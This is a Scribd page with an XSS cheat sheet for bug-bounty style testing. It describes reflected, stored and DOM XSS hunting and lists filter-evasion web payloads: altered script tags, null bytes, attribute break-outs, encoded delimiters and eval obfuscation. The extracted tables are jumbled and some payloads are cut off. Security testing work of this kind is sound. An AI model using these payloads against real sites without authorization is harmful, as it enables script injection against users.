Scribd Logo
Upload

Welcome to Scribd!

  • posting-XSS Cheatsheet

    Uploaded by

    Abdullahi Nasir
    5 views5 pages
    The document provides a cheat sheet for cross-site scripting (XSS) attacks. It lists different types of XSS (reflected, stored, DOM) and strategies for active and passive XSS hunting. It also discusses techniques for evading input filters, including modifying tags and attributes, using different event handlers, delimiters, and the eval() function to obfuscate payloads.

    Original Description:

    Original Title

    posting-XSS cheatsheet

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document provides a cheat sheet for cross-site scripting (XSS) attacks. It lists different types of XSS (reflected, stored, DOM) and strategies for active and passive XSS hunting. It also discusses techniques for evading input filters, including modifying tags and attributes, using different event handlers, delimiters, and the eval() function to obfuscate payloads.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    5 views5 pages

    posting-XSS Cheatsheet

    Uploaded by

    Abdullahi Nasir
    The document provides a cheat sheet for cross-site scripting (XSS) attacks. It lists different types of XSS (reflected, stored, DOM) and strategies for active and passive XSS hunting. It also discusses techniques for evading input filters, including modifying tags and attributes, using different event handlers, delimiters, and the eval() function to obfuscate payloads.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 5

    XSS Cheat sheet

    Active XSS hunting


    Attack strategy
    Passive XSS hunting
    Attack strategy
    Filter evasion

    Active XSS hunting


    Attack strategy
    Types of XSS

    a Reflected XSS Stored XSS DOM XSS


    Value is not stored in
    Value is stored in
    Value database but instead Value gets put into DOM
    database and gotten
    reflection from a GET or POST Sink
    from there
    parameter
    Identify where a value is Identify where a Identify where a value is
    stored into the DB and value is reflected into put into a DOM sink and
    reflected back onto the the response + reflected back onto the
    Test
    page + Assess the input Assess the input they page + Assess the input
    objectives
    they accept and see if we accept and see if we they accept and see if we
    can't pass around any can't pass around can't pass around any
    filters any filters filters
    Detect input vectors
    Detect input vectors by Static code review works
    Step 1 by testing ALL
    testing ALL parameters best for this
    parameters

    XSS Cheat sheet 1


    a Reflected XSS Stored XSS DOM XSS
    Find the DOM sinks by
    entering a random value
    Analyse the results
    Analyse the results and looking at the
    Step 2 depending on the
    depending on the context developer console, try to
    context
    find the value where it is
    reflected and the context

    Attacker MUST use


    Check impact of attack Check impact of developer console and not
    Step 3
    vector attack vector inspect source as that will
    not show DOM elements

    Untitled

    Passive XSS hunting


    Attack strategy
    Enter "'`><u>Rat was here<img src=x> into every fields that you see.

    Name, last name, adress,... at registration

    Names and content of ever object you create

    EVERYWHERE

    If you encounter a value that's reflected, determine context.

    Contexts

    JavaScript HTML Tag attribute


    Column HTML Tag context
    context context

    Attack
    '"` <u>Rat was here + <img src=x> "'`>
    vector
    Breaks Nothing, reflects value into HTML HTML tag attribute
    Breaks javascript context without sanitise, allowing for such as "Value" for
    functions own tags <input> tag

    XSS Cheat sheet 2


    JavaScript HTML Tag attribute
    Column HTML Tag context
    context context

    Try to insert
    Insert JS event handler
    Exploit our own JS Add event handlers to tags
    or JS code into tag
    code
    Example '); alert(); — <img src=x onerror=alert()> ' alert(); '

    Filter evasion
    Techniques

    Name Tags Column

    <script>alert(1)</script> <script >alert(1)


    </script> <script >alert(1)</script> Encoded
    tabs/newlines/CR <script&#9>alert(1) Doing basic things like
    Basic </script> <script&#10>alert(1)</script> adding spaces, encoding
    modifications <script&#13>alert(1)</script> Capital letters tabs, newlines and carriege
    ScRipT>alert(1)</sCriPt>Adding nullbytes: rerurns can do a lot alread
    %00script>alert(1)</script>
    <script>al%00ert(1)</script>

    XSS Cheat sheet 3


    Name Tags Column
    <input type="text" name="input"
    value="hello"> <input type="text"
    name="input" value="><script>alert(1)
    </script> <randomtag type="text"
    name="input" value="><script>alert(1)
    </script> <input/type="text" name="input"
    value="><script>alert(1)</script>
    <input&#9type="text" name="input"
    value="><script>alert(1)</script>
    <input&#10type="text" name="input"
    value="><script>alert(1)</script> We can do the same basic
    Attributes <input&#13type="text" name="input" modifications to attribute
    and tags value="><script>alert(1)</script> tags and add things like
    <input/'type="text" name="input" value="> nullbytes
    <script>alert(1)</script> <iNpUt type="text"
    name="input" value="><script>alert(1)
    </script> <%00input type="text"
    name="input" value="><script>alert(1)
    </script> <inp%00ut type="text"
    name="input" value="><script>alert(1)
    </script> <input t%00ype="text"
    name="input" value="><script>alert(1)
    </script> <input type="text" name="input"
    value="><script>a%00lert(1)</script>

    Try all different event


    handlers
    Use burp intruder, select your event handler
    Event https://portswigger.net/web-
    that's blocked and use burp suites cheat
    handlers security/cross-site-
    sheet to test all event handlers
    scripting/cheat-sheet Use
    burp intruder

    <img onerror="alert(1)"src=x> <img


    onerror='alert(1)'src=x> URL encodign <img
    Sometimes we can play with
    onerror=&#34alert(1)&#34src=x> <img
    Delimiters things like delimiters by
    onerror=&#39alert(1)&#39src=x> Backticks
    and brackers encoding them if they are
    <img onerror= alert(1) src=x> Encoded
    blocked
    backtics <img
    onerror=&#96alert(1)&#96src=x>

    XSS Cheat sheet 4


    Name Tags Column

    Double use of delimiters


    Delimiters <<script>alert(1)//<</script> Unknown
    and brackers delimiters «input onsubmit=alert(1)»
    -2 Encoded &#174input
    onsubmit=alert(1)&#175

    <script>eval('a\u006cert(1)')</script> We can also make use of the


    <script>eval('al' + 'ert(1)')</script> eval() function in JS to
    Eval()
    <script>eval(String.fromCharCode(97, 108, obfuscate some strings so
    101, 114, 116, 40, 49, 41/script> they won't be filtered
    Using filtered
    words in If script is filtered <scrscriptipt> might This helped me find many
    filtered become <script> bounties😂
    words

    Use your
    imagination
    3

    XSS Cheat sheet 5

    You might also like